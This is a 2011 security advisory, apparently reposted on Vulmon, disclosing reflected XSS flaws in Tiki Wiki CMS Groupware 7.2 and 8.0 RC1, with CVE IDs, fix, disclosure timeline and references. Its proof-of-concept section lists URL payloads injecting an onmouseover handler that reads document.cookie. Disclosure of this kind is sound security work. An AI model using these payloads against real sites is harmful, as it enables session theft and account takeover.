Vulmon
Advisory: Tiki Wiki CMS Groupware Multiple XSS vulnerabilities
Advisory ID: INFOSERVE-ADV2011-01
Author: Stefan Schurtz
Contact: security@infoserve.de
Affected Software: Successfully tested on Tiki 7.2 & 8.0 RC1
Vendor URL: http://info.tiki.org/
Vendor Status: fixed for Tiki 7 (New Tiki 6 LTS release in progress)
CVE-ID: CVE-2011-4454, CVE-2011-4455
==========================
Vulnerability Description
==========================
All versions of Tiki 6 and Tiki 7 and version Tiki 8.0RC1 are prone to multiple XSS vulnerabilities
==================
PoC-Exploit
==================
8.0RC1
http://<target>/tiki-8.0.RC1/tiki-remind_password.php/" onmouseover="alert(document.cookie)"
http://<target>/tiki-8.0.RC1/tiki-index.php/" onmouseover="alert(document.cookie)"
http://<target>/tiki-8.0.RC1/tiki-login_scr.php/" onmouseover="alert(document.cookie)"
http://<target>/tiki-8.0.RC1/tiki-index/" onmouseover="alert(document.cookie)"
7.2
http://<target>/tiki-7.2/tiki-admin_system.php/" onmouseover="alert(document.cookie)"
http://<target>/tiki-7.2/tiki-pagehistory.php/" onmouseover="alert(document.cookie)"
http://<target>/tiki-7.2/tiki-removepage.php/" onmouseover="alert(document.cookie)"
http://<target>/tiki-7.2/tiki-rename_page.php/" onmouseover="alert(document.cookie)"
=========
Solution
=========
Upgrade to Tiki 8.1 (End-of-Life for Tiki 7.x)
====================
Disclosure Timeline
====================
02-Nov-2011 - informed Security Team (security@tikiwiki.org)
03-Nov-2011 - feedback from vendor
11-Nov-2011 - release of version 8.1 (End-of-Life for Tiki 7.x)
========
Credits
========
Vulnerabilities found and advisory written by the INFOSERVE Security Team
===========
References
===========
http://info.tiki.org/
http://dev.tiki.org/tiki-view_tracker_item.php?itemId=4027#content1
http://info.tiki.org/article182-Tiki-8-1-Now-Available-End-of-Life-for-Tiki-7-x
http://secunia.com/advisories/46740
<p>